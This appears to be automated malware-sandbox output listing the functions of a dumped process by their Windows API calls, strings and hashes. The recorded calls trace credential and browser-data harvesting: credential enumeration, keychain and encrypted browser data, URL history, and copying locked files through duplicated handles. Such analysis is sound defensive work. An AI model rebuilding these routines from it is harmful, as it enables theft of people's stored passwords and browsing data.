• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@$memcpymemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2420179184-0
                                                                                                                                                                                                          • Opcode ID: 918725139429929a89f1f48b88d6c4cc4d3c3d390f69a75811133ef8db7b8cf4
                                                                                                                                                                                                          • Instruction ID: 420730b51c6485b03e68e59ad930d3fea23228fdda059c903cb8609e0c2e012e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 918725139429929a89f1f48b88d6c4cc4d3c3d390f69a75811133ef8db7b8cf4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54027D71D042299BDF24DF65C8846EEB7B1BF48314F1481BAE849BB381D738AE81CB55
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                                                                                                          • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileFind$FirstNext
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1690352074-0
                                                                                                                                                                                                          • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                                          • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0041898C
                                                                                                                                                                                                          • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InfoSystemmemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3558857096-0
                                                                                                                                                                                                          • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                                          • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
[Control-flow graph of the function starting at 0044553B; the graph image's edge list is omitted here. Nodes are marked Executed / Not Executed.]
APIs
• memset.MSVCRT ref: 004455C2
• wcsrchr.MSVCRT ref: 004455DA
• memset.MSVCRT ref: 0044570D
• memset.MSVCRT ref: 00445725
  • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
  • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
  • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
  • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
  • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
  • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
  • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
  • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
• memset.MSVCRT ref: 0044573D
• memset.MSVCRT ref: 00445755
• memset.MSVCRT ref: 004458CB
• memset.MSVCRT ref: 004458E3
• memset.MSVCRT ref: 0044596E
• memset.MSVCRT ref: 00445A10
• memset.MSVCRT ref: 00445A28
• memset.MSVCRT ref: 00445AC6
  • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
  • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
  • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
  • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
  • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
• memset.MSVCRT ref: 00445B52
• memset.MSVCRT ref: 00445B6A
• memset.MSVCRT ref: 00445C9B
• memset.MSVCRT ref: 00445CB3
• _wcsicmp.MSVCRT ref: 00445D56
• memset.MSVCRT ref: 00445B82
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
• memset.MSVCRT ref: 00445986
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
• String ID: *.*$Apple Computer\Preferences\keychain.plist
• API String ID: 2745753283-3798722523
• Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
• Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
• Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
• Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
  • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                                            • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                                            • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                                            • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                                                                                                          • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                                                                          • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                                                                          • API String ID: 2744995895-28296030
                                                                                                                                                                                                          • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                                          • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

APIs
• memset.MSVCRT ref: 0040B71C
  • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
  • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
• wcsrchr.MSVCRT ref: 0040B738
• memset.MSVCRT ref: 0040B756
• memset.MSVCRT ref: 0040B7F5
• CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
• CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
• FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
• memset.MSVCRT ref: 0040B851
• memset.MSVCRT ref: 0040B8CA
• memcmp.MSVCRT ref: 0040B9BF
  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
• DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
• memset.MSVCRT ref: 0040BB53
• memcpy.MSVCRT ref: 0040BB66
• LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateDeleteFindLibraryLocalNotificationProcmemcmpmemcpywcscpy
• String ID: chp$v10
• API String ID: 170802307-2783969131
• Opcode ID: 8dc6b8fe780278cd99cc613ec7166550d0a6417af5ac3a690e601795cd80acd7
• Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
• Opcode Fuzzy Hash: 8dc6b8fe780278cd99cc613ec7166550d0a6417af5ac3a690e601795cd80acd7
• Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
• ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
• memset.MSVCRT ref: 0040E380
  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
  • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
• wcschr.MSVCRT ref: 0040E3B8
• memcpy.MSVCRT ref: 0040E3EC
• memcpy.MSVCRT ref: 0040E407
• memcpy.MSVCRT ref: 0040E422
• memcpy.MSVCRT ref: 0040E43D
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
• String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
• API String ID: 3073804840-2252543386
• Opcode ID: 35fc9b2dc3bf0c53ac8202c9ceeae987a6694a0ed3ba5102275c9a20083620c3
• Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
• Opcode Fuzzy Hash: 35fc9b2dc3bf0c53ac8202c9ceeae987a6694a0ed3ba5102275c9a20083620c3
• Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: memcpy$memcmp$ByteCharMultiWidememset
• String ID:
• API String ID: 3715365532-3916222277
• Opcode ID: 01ed04e1a7b420fb387fb27120c7235570de5edaa712acc26e4f47695a5ab2cb
• Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
• Opcode Fuzzy Hash: 01ed04e1a7b420fb387fb27120c7235570de5edaa712acc26e4f47695a5ab2cb
• Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
                                                                                                                                                                                                            • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                                            • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                                            • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                                            • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                                                            • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                                            • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                          • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                            • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                                            • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                            • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                            • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                          • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                          • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                          • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                                                                          • String ID: bhv
                                                                                                                                                                                                          • API String ID: 327780389-2689659898
                                                                                                                                                                                                          • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                                                          • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          control_flow_graph 692 413f4f-413f52 693 413fa5 692->693 694 413f54-413f5a call 40a804 692->694 696 413f5f-413fa4 GetProcAddress * 5 694->696 696->693
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                                          • API String ID: 2941347001-70141382
                                                                                                                                                                                                          • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                                                                                                                          • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          control_flow_graph 697 4466f4-44670e call 446904 GetModuleHandleA 700 446710-44671b 697->700 701 44672f-446732 697->701 700->701 702 44671d-446726 700->702 703 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 701->703 705 446747-44674b 702->705 706 446728-44672d 702->706 711 4467ac-4467b7 __setusermatherr 703->711 712 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 703->712 705->701 707 44674d-44674f 705->707 706->701 709 446734-44673b 706->709 710 446755-446758 707->710 709->701 713 44673d-446745 709->713 710->703 711->712 716 446810-446819 712->716 717 44681e-446825 712->717 713->710 718 4468d8-4468dd call 44693d 716->718 719 446827-446832 717->719 720 44686c-446870 717->720 723 446834-446838 719->723 724 44683a-44683e 719->724 721 446845-44684b 720->721 722 446872-446877 720->722 726 446853-446864 GetStartupInfoW 721->726 727 44684d-446851 721->727 722->720 723->719 723->724 724->721 728 446840-446842 724->728 730 446866-44686a 726->730 731 446879-44687b 726->731 727->726 727->728 728->721 732 44687c-446894 GetModuleHandleA call 41276d 730->732 731->732 735 446896-446897 exit 732->735 736 44689d-4468d6 _cexit 732->736 735->736 736->718
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2827331108-0
                                                                                                                                                                                                          • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                                                                                                          • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                          • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                                                                          • FindCloseUrlCache.WININET(?), ref: 0040C3B0
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
• String ID: visited:
• API String ID: 1157525455-1702587658
• Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
• Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
• Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
• Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
• Graph export (basic blocks, call targets and edges; the rendered graph and its Executed / Not Executed colouring are not reproduced): control_flow_graph 763 40e175-40e1a1 call 40695d call 406b90 768 40e1a7-40e1e5 memset 763->768 769 40e299-40e2a8 call 4069a3 763->769 771 40e1e8-40e1fa call 406e8f 768->771 775 40e270-40e27d call 406b53 771->775 776 40e1fc-40e219 call 40dd50 * 2 771->776 775->771 781 40e283-40e286 775->781 776->775 787 40e21b-40e21d 776->787 784 40e291-40e294 call 40aa04 781->784 785 40e288-40e290 ??3@YAXPAX@Z 781->785 784->769 785->784 787->775 788 40e21f-40e235 call 40742e 787->788 788->775 791 40e237-40e242 call 40aae3 788->791 791->775 794 40e244-40e26b _snwprintf call 40a8d0 791->794 794->775
APIs
  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
• memset.MSVCRT ref: 0040E1BD
  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
• ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
  • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
  • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
• _snwprintf.MSVCRT ref: 0040E257
  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
• String ID: $ContainerId$Container_%I64d$Containers$Name
• API String ID: 3883404497-2982631422
• Opcode ID: f6320f83e9b091826697580f88646c77f053f42bbd7529e7c130ef97409cf436
• Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
• Opcode Fuzzy Hash: f6320f83e9b091826697580f88646c77f053f42bbd7529e7c130ef97409cf436
• Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
APIs
  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
  • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
• memset.MSVCRT ref: 0040BC75
• memset.MSVCRT ref: 0040BC8C
• WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
• memcmp.MSVCRT ref: 0040BCD6
• memcpy.MSVCRT ref: 0040BD2B
• LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
